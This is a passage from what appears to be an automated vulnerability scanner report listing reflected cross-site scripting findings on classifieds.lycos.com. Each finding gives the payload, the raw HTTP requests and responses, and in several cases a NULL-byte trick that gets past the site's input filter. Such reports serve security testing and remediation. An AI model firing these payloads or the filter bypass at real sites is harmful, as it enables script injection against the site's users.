This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet-cat/?ae787"><script>alert(1)</script>ab025033532=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:11:47 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:47 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-cat/?ae787"><script>alert(1)</script>ab025033532=1&mobile=1" rel="nofollow">
...[SNIP]...

1.130. http://classifieds.lycos.com/sale-pet-dog/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-dog/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a03f9"><script>alert(1)</script>de74cd9b04f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet-doga03f9"><script>alert(1)</script>de74cd9b04f/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:04:47 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:47 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-doga03f9"><script>alert(1)</script>de74cd9b04f/?mobile=1" rel="nofollow">
...[SNIP]...

1.131. http://classifieds.lycos.com/sale-pet-dog/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-dog/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc571"><script>alert(1)</script>0c857962aee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet-dog/?cc571"><script>alert(1)</script>0c857962aee=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:04:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:14 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 56932

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-dog/?cc571"><script>alert(1)</script>0c857962aee=1&mobile=1" rel="nofollow">
...[SNIP]...

1.132. http://classifieds.lycos.com/sale-pet-dog/12-week-old-boxer-puppies-2416167321 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-dog/12-week-old-boxer-puppies-2416167321

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fb30"><script>alert(1)</script>e061f61c48a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet-dog9fb30"><script>alert(1)</script>e061f61c48a/12-week-old-boxer-puppies-2416167321 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:03:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:03:56 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17799

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-dog9fb30"><script>alert(1)</script>e061f61c48a/12-week-old-boxer-puppies-2416167321?mobile=1" rel="nofollow">
...[SNIP]...

1.133. http://classifieds.lycos.com/sale-pet-dog/12-week-old-boxer-puppies-2416167321 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-dog/12-week-old-boxer-puppies-2416167321

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00103d3"><script>alert(1)</script>4422a66977f was submitted in the REST URL parameter 2. This input was echoed as 103d3"><script>alert(1)</script>4422a66977f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /sale-pet-dog/12-week-old-boxer-puppies-2416167321%00103d3"><script>alert(1)</script>4422a66977f HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:04:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:37 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-dog/12-week-old-boxer-puppies-2416167321%00103d3"><script>alert(1)</script>4422a66977f?mobile=1" rel="nofollow">
...[SNIP]...

1.134. http://classifieds.lycos.com/sale-pet-dog/12-week-old-boxer-puppies-2416167321 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-dog/12-week-old-boxer-puppies-2416167321

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3206"><script>alert(1)</script>261d836b86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet-dog/12-week-old-boxer-puppies-2416167321?c3206"><script>alert(1)</script>261d836b86=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:03:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:03:33 GMT; path=/
Set-Cookie: classifieds[lastpage][0][category]=sale%2Fpet%2Fdog; path=/
Set-Cookie: classifieds[lastpage][0][name]=Dogs; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-dog/12-week-old-boxer-puppies-2416167321?c3206"><script>alert(1)</script>261d836b86=1&mobile=1" rel="nofollow">
...[SNIP]...

1.135. http://classifieds.lycos.com/sale-pet-dog/cute-english-bulldog-puppies-2416163730 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-dog/cute-english-bulldog-puppies-2416163730

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b83b1"><script>alert(1)</script>1d6589b91 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet-dogb83b1"><script>alert(1)</script>1d6589b91/cute-english-bulldog-puppies-2416163730 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:04:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:10 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-dogb83b1"><script>alert(1)</script>1d6589b91/cute-english-bulldog-puppies-2416163730?mobile=1" rel="nofollow">
...[SNIP]...

1.136. http://classifieds.lycos.com/sale-pet-dog/cute-english-bulldog-puppies-2416163730 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-dog/cute-english-bulldog-puppies-2416163730

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0034b07"><script>alert(1)</script>46ce0917467 was submitted in the REST URL parameter 2. This input was echoed as 34b07"><script>alert(1)</script>46ce0917467 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /sale-pet-dog/cute-english-bulldog-puppies-2416163730%0034b07"><script>alert(1)</script>46ce0917467 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:04:41 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:41 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-dog/cute-english-bulldog-puppies-2416163730%0034b07"><script>alert(1)</script>46ce0917467?mobile=1" rel="nofollow">
...[SNIP]...

1.137. http://classifieds.lycos.com/sale-pet-dog/cute-english-bulldog-puppies-2416163730 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-dog/cute-english-bulldog-puppies-2416163730

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e64d"><script>alert(1)</script>505d3fe4c42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet-dog/cute-english-bulldog-puppies-2416163730?8e64d"><script>alert(1)</script>505d3fe4c42=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:03:38 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:03:38 GMT; path=/
Set-Cookie: classifieds[lastpage][0][category]=sale%2Fpet%2Fdog; path=/
Set-Cookie: classifieds[lastpage][0][name]=Dogs; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23530

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-dog/cute-english-bulldog-puppies-2416163730?8e64d"><script>alert(1)</script>505d3fe4c42=1&mobile=1" rel="nofollow">
...[SNIP]...

1.138. http://classifieds.lycos.com/sale-pet-dog/cute-english-bulldog-puppies-2416171986 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-dog/cute-english-bulldog-puppies-2416171986

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cf88"><script>alert(1)</script>840e3c3ce1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet-dog9cf88"><script>alert(1)</script>840e3c3ce1/cute-english-bulldog-puppies-2416171986 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 14:59:39 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:39 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-dog9cf88"><script>alert(1)</script>840e3c3ce1/cute-english-bulldog-puppies-2416171986?mobile=1" rel="nofollow">
...[SNIP]...

1.139. http://classifieds.lycos.com/sale-pet-dog/cute-english-bulldog-puppies-2416171986 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-dog/cute-english-bulldog-puppies-2416171986

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %004af5c"><script>alert(1)</script>54c8442343a was submitted in the REST URL parameter 2. This input was echoed as 4af5c"><script>alert(1)</script>54c8442343a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /sale-pet-dog/cute-english-bulldog-puppies-2416171986%004af5c"><script>alert(1)</script>54c8442343a HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:00:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:17 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-dog/cute-english-bulldog-puppies-2416171986%004af5c"><script>alert(1)</script>54c8442343a?mobile=1" rel="nofollow">
...[SNIP]...

1.140. http://classifieds.lycos.com/sale-pet-dog/cute-english-bulldog-puppies-2416171986 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-dog/cute-english-bulldog-puppies-2416171986

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b318a"><script>alert(1)</script>f1eb897387b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet-dog/cute-english-bulldog-puppies-2416171986?b318a"><script>alert(1)</script>f1eb897387b=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:59:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:15 GMT; path=/
Set-Cookie: classifieds[lastpage][0][category]=sale%2Fpet%2Fdog; path=/
Set-Cookie: classifieds[lastpage][0][name]=Dogs; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23473

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-dog/cute-english-bulldog-puppies-2416171986?b318a"><script>alert(1)</script>f1eb897387b=1&mobile=1" rel="nofollow">
...[SNIP]...

1.141. http://classifieds.lycos.com/sale-pet-dog/healthy-english-bulldog-puppies-2416171752 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-dog/healthy-english-bulldog-puppies-2416171752

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e47d"><script>alert(1)</script>3e3b210a263 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet-dog1e47d"><script>alert(1)</script>3e3b210a263/healthy-english-bulldog-puppies-2416171752 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:03:54 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:03:54 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17817

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-dog1e47d"><script>alert(1)</script>3e3b210a263/healthy-english-bulldog-puppies-2416171752?mobile=1" rel="nofollow">
...[SNIP]...

1.142. http://classifieds.lycos.com/sale-pet-dog/healthy-english-bulldog-puppies-2416171752 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-dog/healthy-english-bulldog-puppies-2416171752

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c2c49"><script>alert(1)</script>939ac719ce9 was submitted in the REST URL parameter 2. This input was echoed as c2c49"><script>alert(1)</script>939ac719ce9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /sale-pet-dog/healthy-english-bulldog-puppies-2416171752%00c2c49"><script>alert(1)</script>939ac719ce9 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:04:31 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:31 GMT; path=/
